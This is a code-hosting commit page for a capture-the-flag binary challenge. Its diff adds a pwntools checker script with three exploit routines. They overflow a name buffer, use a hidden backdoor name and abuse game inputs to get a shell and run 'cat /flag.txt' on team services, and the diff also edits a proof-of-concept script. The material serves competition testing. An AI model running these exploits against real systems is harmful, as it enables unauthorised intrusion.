myitinos
/
spell-warz-again-final
1
0
Fork 0
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
Browse Source

update

master
myitinos 6 years ago
parent
6e1a6a4b10
commit
5474fa12ed
5 changed files with 106 additions and 5 deletions
Unified View
Diff Options
Show Stats Download Patch File Download Diff File
  1. +101
    -0
      checker.py
  2. +3
    -3
      lib/UserInterface.cpp
  3. +2
    -2
      poc.py
  4. BIN
      spell-warz-again-final
  5. BIN
      spell-warz-again-final-patched

+ 101
- 0
checker.py View File

@ -0,0 +1,101 @@
#! /usr/bin/env python2
from pwn import process, remote
HOST = "192.168.2.20"
TOTAL_TEAMS = 10
FORMAT = "SlashRootCTF"
def run():
# return process(FILENAME)
return remote("127.0.0.1", 60204)
def poc0(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
if "young" in p.recvuntil(">"):
p.sendline("y")
p.recvuntil(">")
p.sendline("2")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recv(46)
if FORMAT in flag:
return True
else:
return False
else:
return False
def poc1(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline("Leo")
p.recvuntil(">")
p.sendline("y")
for _ in range(2):
p.recvuntil(">")
p.sendline("3")
p.recvuntil(">")
p.sendline("0")
if "Who" in p.recvuntil(">"):
return False
p.sendline("y")
p.recvuntil(">")
p.sendline("1")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in range(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recv(46)
if FORMAT in flag:
return True
else:
return False
def poc2(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
p.recvuntil(">")
p.sendline("y")
p.recvuntil(">")
p.sendline("6")
if "Lv: 1000000" in p.recvuntil(">"):
p.sendline("2")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recv(46)
if FORMAT in flag:
return True
else:
return False
else:
return False
if __name__ == "__main__":
for i in range(1):
print poc0(HOST, (60004 + (i*100)))
print poc1(HOST, (60004 + (i*100)))
print poc2(HOST, (60004 + (i*100)))

+ 3
- 3
lib/UserInterface.cpp View File

@ -1,7 +1,7 @@
#include "UserInterface.hpp" #include "UserInterface.hpp"
const int UserInterface::INTERVAL = 100;
const int UserInterface::MINI_INTERVAL = 50;
const int UserInterface::INTERVAL = 0;
const int UserInterface::MINI_INTERVAL = 0;
const int UserInterface::MAX_DAY = 28; const int UserInterface::MAX_DAY = 28;
const int UserInterface::MAX_MONTH = 12; const int UserInterface::MAX_MONTH = 12;
const int UserInterface::MAX_YEAR = 100; const int UserInterface::MAX_YEAR = 100;
@ -225,4 +225,4 @@ void UserInterface::characterInfo(Character &c)
<< "\n Xp: " << c.getExperience() << "\n Xp: " << c.getExperience()
<< "\n next: " << c.toNextLevel() << "\n next: " << c.toNextLevel()
<< "\n++++++++++++++++++++++++" << std::endl; << "\n++++++++++++++++++++++++" << std::endl;
}
}

+ 2
- 2
poc.py View File

@ -4,7 +4,7 @@ FILENAME = "./spell-warz-again-final"
def run(): def run():
# return process(FILENAME) # return process(FILENAME)
return remote("103.200.7.150", 60104)
return remote("127.0.0.1", 60204)
def poc0(): def poc0():
p = run() p = run()
@ -52,7 +52,7 @@ def poc1():
def poc2(): def poc2():
p = run() p = run()
print p.recvuntil(">") print p.recvuntil(">")
p.sendline("__th3_w0rLd_D3str0Y3r__")
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
print p.recvuntil(">") print p.recvuntil(">")
p.sendline("y") p.sendline("y")
print p.recvuntil(">") print p.recvuntil(">")

BIN
spell-warz-again-final View File


BIN
spell-warz-again-final-patched View File


Write Preview
Loading…
Cancel
Save